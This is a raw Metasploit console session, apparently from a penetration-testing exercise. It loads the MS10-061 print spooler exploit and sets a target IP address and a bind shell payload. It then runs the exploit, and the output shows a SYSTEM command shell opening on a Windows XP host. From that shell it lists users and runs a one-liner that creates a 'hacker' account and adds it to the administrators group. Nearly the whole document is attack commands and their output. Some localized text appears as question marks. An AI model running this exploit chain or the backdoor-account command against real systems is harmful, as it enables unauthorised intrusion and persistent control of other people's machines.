[*] Please wait while the Metasploit Pro Console initializes... 
[*] Starting Metasploit Console... 
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM 
MMMMMMMMMMM MMMMMMMMMM 
MMMN$ vMMMM 
MMMNl MMMMM MMMMM JMMMM 
MMMNl MMMMMMMN NMMMMMMM JMMMM 
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM 
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM 
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM 
MMMNI MMMMM MMMMMMM MMMMM jMMMM 
MMMNI MMMMM MMMMMMM MMMMM jMMMM 
MMMNI MMMNM MMMMMMM MMMMM jMMMM 
MMMNI WMMMM MMMMMMM MMMM# JMMMM 
MMMMR ?MMNM MMMMM .dMMMM 
MMMMNm `?MMM MMMM` dMMMMM 
MMMMMMN ?MM MM? NMMMMMN 
MMMMMMMMNe JMMMMMNMMM 
MMMMMMMMMMNm, eMMMMMNMMNMM 
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM 
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM 
=[ metasploit v4.4.0-dev [core:4.4 api:1.0] 
+ -- --=[ 840 exploits - 495 auxiliary - 146 post 
+ -- --=[ 250 payloads - 27 encoders - 8 nops 
[*] Successfully loaded plugin: pro 
msf > search ms10_061 
Matching Modules 
================ 
Name Disclosure Date Rank Description 
---- --------------- ---- ----------- 
exploit/windows/smb/ms10_061_spoolss 2010-09-14 excellent Microsoft Print Spooler Service Impersonation 
Vulnerability 
msf > use exploit/windows/smb/ms10_061_spoolss 
msf exploit(ms10_061_spoolss) > info 
Name: Microsoft Print Spooler Service Impersonation Vulnerability 
Module: exploit/windows/smb/ms10_061_spoolss 
Version: 14976 
Platform: Windows 
Privileged: Yes 
License: Metasploit Framework License (BSD) 
Rank: Excellent 
Provided by: 
jduck <jduck@metasploit.com> 
hdm <hdm@metasploit.com> 
Available targets: 
Id Name 
-- ---- 
0 Windows Universal 
Basic options: 
Name Current Setting Required Description 
---- --------------- -------- ----------- 
PNAME no The printer share name to use on the target 
RHOST yes The target address 
RPORT 445 yes Set the SMB service port 
SMBPIPE spoolss no The named pipe for the spooler service 
Payload information: 
Space: 1024 
Avoid: 0 characters 
Description: 
This module exploits the RPC service impersonation vulnerability 
detailed in Microsoft Bulletin MS10-061. By making a specific DCE 
RPC request to the StartDocPrinter procedure, an attacker can 
impersonate the Printer Spooler service to create a file. The 
working directory at the time is %SystemRoot%\system32. An attacker 
can specify any file name, including directory traversal or full 
paths. By sending WritePrinter requests, an attacker can fully 
control the content of the created file. In order to gain code 
execution, this module writes to a directory used by Windows 
Management Instrumentation (WMI) to deploy applications. This 
directory (Wbem\Mof) is periodically scanned and any new .mof files 
are processed automatically. This is the same technique employed by 
the Stuxnet code found in the wild. 
References: 
http://www.osvdb.org/67988 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729 
http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx 
msf exploit(ms10_061_spoolss) > set RHOST 142.168.2.20 
RHOST => 142.168.2.20 
msf exploit(ms10_061_spoolss) > set PAYLOAD windows/shell/bind_tcp 
PAYLOAD => windows/shell/bind_tcp 
msf exploit(ms10_061_spoolss) > info 
Name: Microsoft Print Spooler Service Impersonation Vulnerability 
Module: exploit/windows/smb/ms10_061_spoolss 
Version: 14976 
Platform: Windows 
Privileged: Yes 
License: Metasploit Framework License (BSD) 
Rank: Excellent 
Provided by: 
jduck <jduck@metasploit.com> 
hdm <hdm@metasploit.com> 
Available targets: 
Id Name 
-- ---- 
0 Windows Universal 
Basic options: 
Name Current Setting Required Description 
---- --------------- -------- ----------- 
PNAME no The printer share name to use on the target 
RHOST 142.168.2.20 yes The target address 
RPORT 445 yes Set the SMB service port 
SMBPIPE spoolss no The named pipe for the spooler service 
Payload information: 
Space: 1024 
Avoid: 0 characters 
Description: 
This module exploits the RPC service impersonation vulnerability 
detailed in Microsoft Bulletin MS10-061. By making a specific DCE 
RPC request to the StartDocPrinter procedure, an attacker can 
impersonate the Printer Spooler service to create a file. The 
working directory at the time is %SystemRoot%\system32. An attacker 
can specify any file name, including directory traversal or full 
paths. By sending WritePrinter requests, an attacker can fully 
control the content of the created file. In order to gain code 
execution, this module writes to a directory used by Windows 
Management Instrumentation (WMI) to deploy applications. This 
directory (Wbem\Mof) is periodically scanned and any new .mof files 
are processed automatically. This is the same technique employed by 
the Stuxnet code found in the wild. 
References: 
http://www.osvdb.org/67988 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729 
http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx 
msf exploit(ms10_061_spoolss) > exploit 
[*] Started bind handler 
[*] Trying target Windows Universal... 
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ... 
[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ... 
[*] Attempting to exploit MS10-061 via \\142.168.2.20\SmartPrinter ... 
[*] Printer handle: 00000000950606c7fee7b348bc5b841597479b61 
[*] Job started: 0x4 
[*] Wrote 73802 bytes to %SystemRoot%\system32\9o43IDgKLE0SjU.exe 
[*] Job started: 0x5 
[*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\vWMbWpPJt8K6aD.mof 
[*] Everything should be set, waiting for a session... 
[*] Sending stage (240 bytes) to 142.168.2.20 
Microsoft Windows XP [???? 5.1.2600] 
(C) ???????? 1985-2001 Microsoft Corp. 
C:\WINDOWS\system32>net user 
net user 
\\ ?????????? 
------------------------------------------------------------------------------- 
Administrator Guest HelpAssistant 
IUSR_INTRA-PC IWAM_INTRA-PC shentouceshiwy 
SUPPORT_388945a0 
???????????????????????????????????? 
C:\WINDOWS\system32>net user hacker 123 /add & net localgroup administrators hacker /add 
net user hacker 123 /add & net localgroup administrators hacker /add 
?????????????? 
?????????????? 
C:\WINDOWS\system32>net user 
net user 
\\ ?????????? 
------------------------------------------------------------------------------- 
Administrator Guest hacker 
HelpAssistant IUSR_INTRA-PC IWAM_INTRA-PC 
shentouceshiwy SUPPORT_388945a0 
???????????????????????????????????? 
C:\WINDOWS\system32>